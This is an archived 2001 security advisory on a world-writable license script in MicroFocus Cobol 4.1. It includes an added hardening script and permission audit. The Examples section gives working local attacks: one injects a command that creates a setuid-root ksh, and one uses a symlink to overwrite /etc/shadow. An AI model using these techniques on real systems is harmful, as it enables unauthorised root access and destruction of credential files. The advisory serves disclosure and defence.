From: Dixie Flatline (echo8FIREST0RM.ORG)
Date: Sun Feb 11 2001 - 19:58:53 CST


    Summary
    -------

    If the AppTrack feature is enabled, the default install of MicroFocus
    Cobol 4.1 (Merant's commercial suite of cobol utilities) contains a
    security hole which can lead to root compromise.

    Specifics
    ---------

    In the default install, /var/mfaslmf is installed mode 777, and
    /var/mfaslmf/nolicense is installed mode 666. nolicense also contains the
    following:

    # Append into a logfile
    if test ! -f /var/mfaslmf/USERLOG
    then
            touch /var/mfaslmf/USERLOG
            chmod 666 /var/mfaslmf/USERLOG
    fi
    echo `date`:No license $* >> /var/mfaslmf/USERLOG

    # mail a specified user (commented out by default; substitute the user name)
    echo `date`:No license $* > /var/mfaslmf/tmpmess
    # mail -s "No AS license" user-name < /var/mfaslmf/tmpmess
    rm /var/mfaslmf/tmpmess

    This presents two major types of problem:

    * Because of the permissions on nolicense, unprivileged users can edit the
    file to insert arbitrary commands into the script. Then, if AppTrack is
    enabled (see below) and the trigger condition occurs (again, see below),
    that code can be executed with superuser privileges.

    * The use of predictably-named temporary files in a world-writeable
    directory can allow local users to append, overwrite or destroy arbitrary
    files, even if nolicense itself is made non-world-writeable.

    Examples
    --------

    Of the first problem:

    $ id
    uid=500(echo8) gid=10(users)
    $ cat >> /var/mfaslmf/nolicense
    /bin/cp /bin/ksh /tmp; chmod 4755 /tmp/ksh
    ^D

    # create a condition under which all available AS licenses are used up.
    # This should not be difficult. When this occurs, /var/mfaslmf/nolicense
    # will run.

    $ ls -alt /tmp/ksh
    -rwsr-xr-x 1 root other 186356 Dec 26 17:04 /tmp/ksh
    $ /tmp/ksh
    # id
    uid=500(echo8) gid=10(users) euid=0(root)
    #

    Of the second:

    $ id
    uid=500(echo8) gid=10(users)
    $ cd /var/mfaslmf
    $ ln -s /etc/shadow tmpmess

    # Again, create a condition under which nolicense will run. This
    # example will overwrite /etc/shadow.

    $ cat /etc/shadow (would need to be done as root, but you get the point...)
    Tue Dec 26 17:08:45 EST 2000:No license
    $

    Conditions
    ----------

    These holes can only be exploited if the AppTrack functionality is enabled.
    This feature is off by default.

    Vulnerable Versions
    -------------------

    4.1 for Solaris/sparc - only version tested.

    Workarounds
    -----------

    Change the permissions on /var/mfaslmf and rewrite nolicense. According to
    the documentation, nolicense is provided as "an example" and the user "can
    edit the nolicense script to your requirements." IMO, example code with
    serious security holes should NOT be distributed. If you don't need this
    feature, delete the script. Regardless of whether or not you need AppTrack
    to work, you should be able to change the permissions on /var/mfaslmf to
    something safer.
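    As an added illustration of this workaround (example code written for this
    page, not Merant's own), the following POSIX sh checks /var/mfaslmf for
    world-writable entries and offers a replacement for the logging part of
    nolicense that avoids the fixed-name tmpmess file; MFASLMF_DIR is an
    assumed variable so the functions can be tried against a scratch directory.

```sh
#!/bin/sh
# Added example, not Merant's code: an audit check for the /var/mfaslmf
# directory described above and a hardened replacement for the logging part
# of nolicense. MFASLMF_DIR defaults to /var/mfaslmf (override it to test
# against a scratch directory).
MFASLMF_DIR="${MFASLMF_DIR:-/var/mfaslmf}"

# Print every world-writable path under the directory (the directory itself
# included) and return 1 if any exist; return 0 when the tree is clean.
check_mfaslmf_perms() {
    dir="${1:-$MFASLMF_DIR}"
    offenders=$(find "$dir" -perm -002 -print 2>/dev/null)
    if [ -n "$offenders" ]; then
        printf 'world-writable under %s:\n%s\n' "$dir" "$offenders"
        return 1
    fi
    return 0
}

# Replacement for the body of nolicense. Differences from the original:
# the log is created with owner-only permissions (umask 077) and is never
# written through a symlink, and the mail staging file comes from mktemp(1)
# instead of the fixed name tmpmess, so a link planted in advance cannot
# redirect the root-owned write. The body is a subshell so the umask change
# does not leak into the caller. Arguments are the license-event text ($*).
log_no_license() (
    umask 077
    log="$MFASLMF_DIR/USERLOG"
    if [ -L "$log" ]; then
        printf 'refusing to write through symlink %s\n' "$log" >&2
        return 1
    fi
    [ -f "$log" ] || : > "$log"        # created mode 600 under umask 077
    printf '%s:No license %s\n' "$(date)" "$*" >> "$log"
    tmp=$(mktemp "$MFASLMF_DIR/tmpmess.XXXXXX") || return 1
    printf '%s:No license %s\n' "$(date)" "$*" > "$tmp"
    # mail -s "No AS license" user-name < "$tmp"   # enable as in the original
    rm -f "$tmp"
)
```

    Run check_mfaslmf_perms as root after fixing the directory; a clean tree
    prints nothing and returns 0.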

    Vendor Notification
    -------------------

    The vendor was notified on 12/26/2000.

    Send comments to echo8gh0st.net